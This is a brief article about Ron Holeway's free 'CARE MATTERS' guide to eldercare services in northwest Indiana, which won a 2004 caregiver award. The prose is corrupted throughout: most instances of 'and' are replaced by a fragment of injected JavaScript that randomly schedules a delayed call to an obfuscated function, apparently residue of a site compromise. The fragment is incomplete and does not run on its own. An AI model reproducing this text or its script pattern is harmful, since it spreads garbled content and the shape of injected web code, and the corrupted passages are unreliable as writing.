FREE HELP FOR SENIOR CITIZENS AND THOSE WHO HELP SENIOR CITIZENS

By Woodrow Wilcox

There is an old saying that “necessity is the mother of invention”.

Necessity pushed a son in San Diego, California to thoroughly research contacts for services andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and assistance for his elderly mother in Griffith, Indiana.

Ron Holeway is originally from Griffith, Indiana. But, his career in advertising andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and writing lead him to work for the major newspaper in San Diego, California. But, when his mother needed help, he researched andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and contacted various providers of assistance andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and services for the elderly in northwest Indiana. It started as a project to help his mother. But, it became a project to help all elderly people in northwest Indiana andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and their relatives andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and friends who care for them.

The project to help his mother sparked an idea in Ron Holeway. Wouldn’t it be nice if all the information that he had collected could be put together for other people to use? After all, many people follow careers that take them from the Calumet Region, but they still have their parents in northwest Indiana.

So, Ron Holeway started publishing a catalog of information devoted to helping senior citizens that he named “CARE MATTERS”. The publication is free to get andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and use. The advertisers pay the entire cost for the publication. It can be obtained at doctor offices, nursing homes, insurance offices andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and elsewhere.

“CARE MATTERS” devotes chapters for various topics including “Safety & Security”, “Emergency Information”, “Community Services & Support Groups”, “Geriatric Consultants”, “Hospitals & Medical Facilities”, “Nursing Care Centers”, “Medical Equipment & Supplies”, “Insurance, Financial & Legal Services”, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and many other categories.

The publication won the 2004 “Caregiver Friendly Award” from TODAY’S CAREGIVER MAGAZINE. For more information, visit www.carematters.com, or call (219) XXX-XXXX.
